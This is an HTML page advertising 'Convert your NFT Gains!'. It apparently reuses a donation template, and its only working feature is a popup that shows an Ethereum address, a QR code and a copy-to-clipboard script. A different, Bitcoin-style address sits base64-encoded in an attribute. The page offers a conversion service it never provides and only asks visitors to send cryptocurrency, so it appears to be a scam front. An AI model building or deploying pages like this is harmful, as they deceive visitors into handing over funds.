<html>
<head>
	<meta content="width=device-width, initial-scale=1" name="viewport" />
	 <!-- site favicon -->
     <link href='https://unpkg.com/boxicons@2.0.9/css/boxicons.min.css' rel='stylesheet'>
     <link href="https://fonts.googleapis.com/css2?family=Poppins:wght@200&display=swap" rel="stylesheet">
     <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.5.1/css/all.min.css" integrity="sha512-DTOQO9RWCH3ppGqcWaEA1BIZOC6xxalwEsw9c2QQeAIftl+Vegovlnee1c9QX4TctnWMn13TZye+giMm8e2LwA==" crossorigin="anonymous" referrerpolicy="no-referrer" />
<link rel="stylesheet" href="css/withdraw.css">
<link rel="stylesheet" href="css/payment.css">
</head>

<style>
    @media (max-width:480px){
        .popup{
           height: 70vh;
        
        }
        .close{
            left: 50vh;
        }
        .content2{
            height: 35vh;
        }
        .writeup{
            width: 50vh;
        }
       
    }
</style>
<body>
    <header>
        <nav>
            <ul class='nav-bar'>
                <li class='logo'><a href='#'><img src="img/images.png"/></a></li>
                <input type='checkbox' id='check' />
                <span class="menu">
                    <li><a href="/index.html">Home</a></li>
                    <li><a href="/page">drops</a></li>
                    <li><a href="/dash">Dashboard</a></li>
                    <li><a href="/wallet.html">Connect</a></li>
                    <li><a href="/upload">Upload</a></li>
                    <label for="check" class="close-menu"><i class="fas fa-times"></i></label>
                </span>
                <label for="check" class="open-menu"><i class="fas fa-bars"></i></label>
            </ul>
        </nav>
        </header>
	
<center>
<div class="box">
	<!-- <img src="images/donatebutton.jpg" alt="Bitcoin Donate Button" border="0" height="80" width="200"> -->
<a href="#donateform"class="bn39" href="/"><span class="bn39span">Convert</span></a>
</div>


    <div class="writeup" id="card">
        <h3>Convert your NFT Gains!</h3>
    
        <p class="para"> Convert your earnings today and unlock immediate value. </p>
    </div>



</center>
<div id="donateform" class="overlay">
	<div class="popup">
<center>
		<h2>Ethereum Address</h2>
		<a class="close" href="#">&times;</a>
		<div class="content">
<div id="copyDiv" class="bxc-title">
    <p>0xd72346dd4eabb484581ea0605fe287672e429a35</p>  
</div>
<br>
<i onclick="copyElementToClipboard()" class="bx bx-copy" data-text="YmMxcWdmcDk1dmh5MGh6cDc5eXd3YXRuN3E4Y3UzcnRuOTI5djJ0ejBn">
    <span  class="bxc-toolip">Copy to clipboard</span>
</i>
		</div>
<br>
<br>
		<h2>Ethereum QR Code</h2>
		<a class="close" href="#">&times;</a>
		<div class="content2">
<img src="images/qr.svg" alt="QR Donate Code" height="150" width="150"> 
		</div>
	</div>
</center>
</div>

   
<script>
    function copyElementToClipboard() {
      var copyDiv = document.getElementById("copyDiv");
      var range = document.createRange();
      range.selectNode(copyDiv);
      window.getSelection().removeAllRanges(); // Clear previous selections
      window.getSelection().addRange(range);
      document.execCommand("copy");
      window.getSelection().removeAllRanges(); // Clear the range selection
      alert("Element copied to clipboard!");
    }
  </script>



 <script src="assets/js/jquery-3.6.0.min.js"></script>
    <script src="assets/js/bootstrap.bundle.min.js"></script>
    <script src="assets/js/waypoints.min.js"></script>
    <script src="assets/js/lightcase.js"></script>
    <script src="assets/js/swiper-bundle.min.js"></script>
    <script src="assets/js/countdown.min.js"></script>
    <script src="assets/js/jquery.counterup.min.js"></script>
    <script src="assets/js/wow.min.js"></script>
    <script src="assets/js/isotope.pkgd.min.js"></script>
    <script src="assets/js/functions.js"></script>
</body>
</html>